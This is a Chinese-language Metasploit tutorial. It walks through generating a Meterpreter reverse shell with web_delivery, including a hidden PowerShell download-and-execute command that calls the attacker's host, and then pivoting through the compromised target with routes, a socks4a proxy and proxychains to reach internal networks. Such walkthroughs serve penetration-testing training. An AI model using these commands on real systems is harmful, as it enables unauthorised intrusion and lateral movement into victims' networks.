0x01 install metasploit

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&
chmod 755 msfinstall &&
./msfinstall

0x0x2 make meterpreter

有很多方式,可以用bind_tcp和reverse_tcp。各种利用就不多说了,参见http://c-chicken.cc/hacking/2015/10/29/Meterpreter-Guide.html。这里我们用的是web_delivery

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf exploit(web_delivery) > set target 2
target => 2

msf exploit(web_delivery) > set LHOST 192.169.0.101
LHOST => 192.169.0.101

msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(web_delivery) > exploit -j

运行得到

powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.169.0.101:8080/5qMLoF86nTI');

放入windows靶机内执行得到meterpreter

0x03 add route
得到meterpreter以后执行backgroud可以看到这个shell的session

meterpreter > background
[*] Backgrounding session 1...

接着可以添加路由,一般都是添加内网的路由,我们举一个例子。

我装metasploit的本机的ip为香港的ip。靶机的ip为重庆的ip。我想通过请求ip.cn查看代理是否搭建成功。我先ping ip.cn得到ip以后,执行

msf auxiliary(socks4a) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

Route traffic destined to a given subnet through a supplied session.
The default comm is Local

msf auxiliary(socks4a) > route add 118.184.180.46 255.255.255.255 1
[*] Route added

添加成功以后搭建socks4a的代理。

msf post(autoroute) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

msf auxiliary(auxiliary/server/socks4a) > set SRVPORT 8888
SRVPORT => 8888
msf auxiliary(auxiliary/server/socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server

然后修改proxychains的配置文件为:

➜  ~ cat /usr/local/etc/proxychains.conf|grep socks4
#       socks4  192.168.1.49    1080
#       proxy types: http, socks4, socks5
socks4 *.*.*.*(存在meterpreter机器的ip) 8888

然后执行:

➜  ~ proxychains4 curl ip.cn
[proxychains] config file found: /usr/local/Cellar/proxychains-ng/4.11/etc/proxychains.conf
[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.11/lib/libproxychains4.dylib
[proxychains] DLL init: proxychains-ng 4.11
[proxychains] Strict chain  ...  *.*.*.*:8888  ...  ip.cn:80  ...  OK
当前 IP:*.*.*.* 来自:重庆市 电信

可以看到已经成功的得到靶机的ip。

0x04 后记

其实这个代理主要还是在本机上面加路由,让到一些网段通过靶机走。那么在渗透内网的时候,我们就可以比如将192这个段加进路由,这样就可以达到进入内网的目的。